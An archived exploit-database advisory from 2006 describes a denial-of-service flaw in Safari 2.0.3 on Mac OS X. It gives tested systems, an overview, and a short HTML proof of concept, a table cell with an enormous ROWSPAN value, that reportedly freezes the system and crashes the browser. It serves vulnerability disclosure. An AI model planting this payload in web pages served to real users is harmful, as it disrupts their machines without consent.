Apple Mac OSX Safari 2.0.3 (417.9.2) - 'ROWSPAN' Denial of Service (PoC)

EDB-ID:

1715




Platform:

OSX

Date:

2006-04-24


<!--
Apple Mac OS X Safari 2.0.3 Vulnerability
=========================================

Author: Yannick von Arx
Email:  yannick[dot]vonarx[at]yanux[dot]ch

Release Date:
April 23th, 2006

Vendor:
Apple Computer Inc.

Tested on:
iBook G4 1.2 GHz with Mac OS X 10.4.5 (Build 8H14) + all Updates from Apple except "10.4.6 Update"
iBook G4 1.33 GHz with Mac OS X 10.4.6 (Build 8I127) + all Updates from Apple
PowerMac G4 Dual 867 MHz with Mac OS X 10.4.6 (Build 8I127) + all Updates from Apple
iMac G4 800 MHz with Mac OS X 10.4.6 (Build 8I127) + all Updates from Apple

Versions affected:
Safari 2.0.3 (417.9.2) latest version under 10.4.5 (Build 8H14) and perhaps prior versions
Safari 2.0.3 (417.9.2) latest version under 10.4.6 (Build 8I127) and perhaps prior versions

Overview:
A vulnerabilitiy exists in Safari 2.0.3 (417.9.2) and perhaps in
prior versions which causes the operating system to slow down SRCOD
(Spinning Rainbow Cursor Of Death), and therefore, it's not possible
to launch any applications like Terminal to kill the process. After
several minutes Safari crashes.

Technical Details:
Create a new File with following code ... -->

<HTML>
<TABLE>
<TR><TD ROWSPAN=2000000000>

# milw0rm.com [2006-04-24]